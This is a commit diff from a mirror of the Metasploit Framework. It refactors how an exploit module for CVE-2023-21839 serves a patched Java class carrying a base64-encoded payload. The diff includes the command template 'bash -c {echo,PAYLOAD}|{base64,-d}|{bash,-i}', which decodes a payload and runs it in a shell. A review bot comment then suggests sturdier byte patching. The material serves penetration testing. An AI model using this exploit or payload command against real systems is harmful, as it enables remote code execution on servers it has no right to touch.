mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-07-18 18:31:41 +02:00
Slight efficiency improvements
parent
e80987ea59
commit
7ca7c6aee1
Binary file not shown.
@ -1,3 +1,5 @@
|
||||
import java.util.Base64;
|
||||
|
||||
public class PayloadRuns {
|
||||
static {
|
||||
try {
|
||||
@ -6,4 +8,4 @@ public class PayloadRuns {
|
||||
ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
@ -375,12 +375,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
|
||||
file = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'), 'rb')
|
||||
class_raw = file.read
|
||||
file.close
|
||||
class_raw = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'))
|
||||
base64_payload = Rex::Text.encode_base64(payload.encoded)
|
||||
command_length = (44 - 'PAYLOAD'.length) + base64_payload.length
|
||||
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('S>'))
|
||||
exec_command_length = 'bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}'.length
|
||||
command_length = (exec_command_length - 'PAYLOAD'.length) + base64_payload.length
|
||||
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('n'))
|
||||
class_raw = class_raw.gsub('PAYLOAD', base64_payload)
|
||||
send_response(cli, 200, 'OK', class_raw)
|
||||
end
|
||||
|
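Review bot: The search pattern in `class_raw.gsub("\x00\x2C", [command_length].pack('n'))` still hard-codes 44, even though this change introduces `exec_command_length` for the same value, so the two can drift apart if the template string or the bundled class file is ever changed. Deriving the pattern from the new variable, `class_raw.gsub([exec_command_length].pack('n'), [command_length].pack('n'))`, keeps them tied together. A one-line comment such as `# two-byte big-endian length prefix of the command string constant in the class file` would explain the magic bytes. Separately, `gsub` rewrites every occurrence of that byte pair in the file rather than only the intended length field, and `pack('n')` wraps silently for values above 65535, so a bounds check on `command_length` before patching would make a failure visible rather than serving a malformed class.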